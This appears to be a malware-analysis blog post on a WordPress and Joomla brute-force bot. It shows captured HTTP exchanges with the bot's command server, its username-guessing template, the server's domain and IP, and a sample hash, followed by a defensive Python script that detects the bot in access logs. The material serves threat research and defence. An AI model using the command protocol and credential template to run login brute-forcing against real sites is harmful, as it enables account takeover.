Resolved cureit.pw to 62.109.17.111
This is the same malware as this previous post.
Correct gate request
GET /cmd.php HTTP/1.0
Host: cureit.pw.
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

HTTP/1.1 200 OK
Date: Wed, 11 Sep 2013 19:17:35 GMT
Server: Apache/2.2.24 (FreeBSD) PHP/5.4.15 mod_ssl/2.2.24 OpenSSL/1.0.1e
X-Powered-By: PHP/5.4.15
Cache-Control: max-age=1
Expires: Wed, 11 Sep 2013 19:17:36 GMT
Vary: Accept-Encoding
Content-Length: 52
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

1
30
hxxp://cureit.pw/temp_brut/1011888.txt
wolf
480
Site list mirrored here. Both WordPress and Joomla sites are included in this list.
The username list has changed: the malware now tries the target's domain name (with and without its TLD) as the login username, in addition to admin and administrator.
GET /login.txt HTTP/1.0
Host: cureit.pw.
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

HTTP/1.1 200 OK
Date: Wed, 11 Sep 2013 19:17:38 GMT
Server: Apache/2.2.24 (FreeBSD) PHP/5.4.15 mod_ssl/2.2.24 OpenSSL/1.0.1e
Last-Modified: Tue, 10 Sep 2013 18:40:04 GMT
ETag: "42d1d3e-2f-4e60bd545e900"
Accept-Ranges: bytes
Content-Length: 47
Cache-Control: max-age=604800
Expires: Wed, 18 Sep 2013 19:17:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

{domain}
{domain}.{zone}
admin
administrator
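As an added example (not code from the post or from the malware), the following Python script does two things a site owner can use: it expands the C2's login.txt template for a given hostname, so you can see which usernames the bot would try against your site and make sure none of them is a real account, and it runs a simple detection over web server access log lines, counting POSTs to the WordPress and Joomla login endpoints that carry the "Mozilla/4.0 (compatible; Synapse)" User-Agent seen in the captures above. The combined log format, the rule that {domain} is the first label after an optional www. and {zone} is the rest, the threshold of three hits, and the sample log lines are all assumptions I made for the example.

```python
import re
from collections import Counter

# Username template exactly as the C2's login.txt returned it (from the post).
LOGIN_TEMPLATE = "{domain} {domain}.{zone} admin administrator"

# User-Agent seen on the bot's C2 requests. Synapse is a Delphi/Pascal socket
# library; the string is a weak indicator on its own, so below it is combined
# with POSTs to CMS login endpoints before anything is flagged.
SYNAPSE_UA = "Mozilla/4.0 (compatible; Synapse)"

# Login endpoints for the two CMSes named in the site list (assumed paths).
LOGIN_PATHS = ("/wp-login.php", "/administrator/index.php")

# Apache/nginx "combined" log format (assumed; adjust to your own log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def expand_usernames(template, hostname):
    """Expand the C2's {domain}/{zone} placeholders for one target hostname.

    Assumption: {domain} is the first label after an optional 'www.' and
    {zone} is everything after it ('www.example.co.uk' -> 'example', 'co.uk').
    """
    labels = hostname.lower().strip(".").split(".")
    if labels and labels[0] == "www":
        labels = labels[1:]
    domain = labels[0] if labels else ""
    zone = ".".join(labels[1:])
    names = []
    for token in template.split():
        if "{zone}" in token and not zone:
            continue  # a bare hostname has no TLD to substitute
        name = token.replace("{domain}", domain).replace("{zone}", zone)
        if name and name not in names:
            names.append(name)
    return names


def parse_log_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def bruteforce_sources(log_lines, threshold=3):
    """Count POSTs to CMS login paths carrying the Synapse UA, per source IP.

    Returns (counts, flagged): counts maps ip -> hits, flagged is the sorted
    list of IPs with at least `threshold` hits.
    """
    counts = Counter()
    for line in log_lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path in LOGIN_PATHS and rec["ua"] == SYNAPSE_UA:
            counts[rec["ip"]] += 1
    flagged = sorted(ip for ip, n in counts.items() if n >= threshold)
    return counts, flagged


# Constructed sample log lines (not from the post); addresses are from
# documentation ranges, timestamps follow the capture date.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Sep/2013:19:18:01 +0000] "POST /wp-login.php HTTP/1.0" 200 3214 "-" "Mozilla/4.0 (compatible; Synapse)"
203.0.113.5 - - [11/Sep/2013:19:18:01 +0000] "POST /wp-login.php HTTP/1.0" 200 3214 "-" "Mozilla/4.0 (compatible; Synapse)"
203.0.113.5 - - [11/Sep/2013:19:18:02 +0000] "POST /wp-login.php HTTP/1.0" 200 3214 "-" "Mozilla/4.0 (compatible; Synapse)"
198.51.100.7 - - [11/Sep/2013:19:18:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2811 "-" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/23.0"
198.51.100.7 - - [11/Sep/2013:19:18:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://www.example.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/23.0"
203.0.113.9 - - [11/Sep/2013:19:18:11 +0000] "POST /administrator/index.php HTTP/1.0" 200 4102 "-" "Mozilla/4.0 (compatible; Synapse)"
"""

if __name__ == "__main__":
    print("usernames the bot would try against www.example.com:",
          expand_usernames(LOGIN_TEMPLATE, "www.example.com"))
    counts, flagged = bruteforce_sources(SAMPLE_LOG.splitlines())
    print("login POSTs with Synapse UA per source:", dict(counts))
    print("flagged sources:", flagged)
```

Matching on the User-Agent alone is fragile, since the string is the library default and trivial to change; the useful signal is the combination of a non-browser UA, POSTs to a login endpoint, and volume per source IP, which is why the function counts hits rather than flagging the first request. Run against your real logs, the expanded username list also tells you whether any account on the site shares its name with the domain, which is what this template is betting on.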
Hosting info: http://whois.domaintools.com/62.109.17.111
Related md5s (Search on malwr.com to download samples)
WordPress bruteforcer: 820da59811ea536331b7189bd86f3c72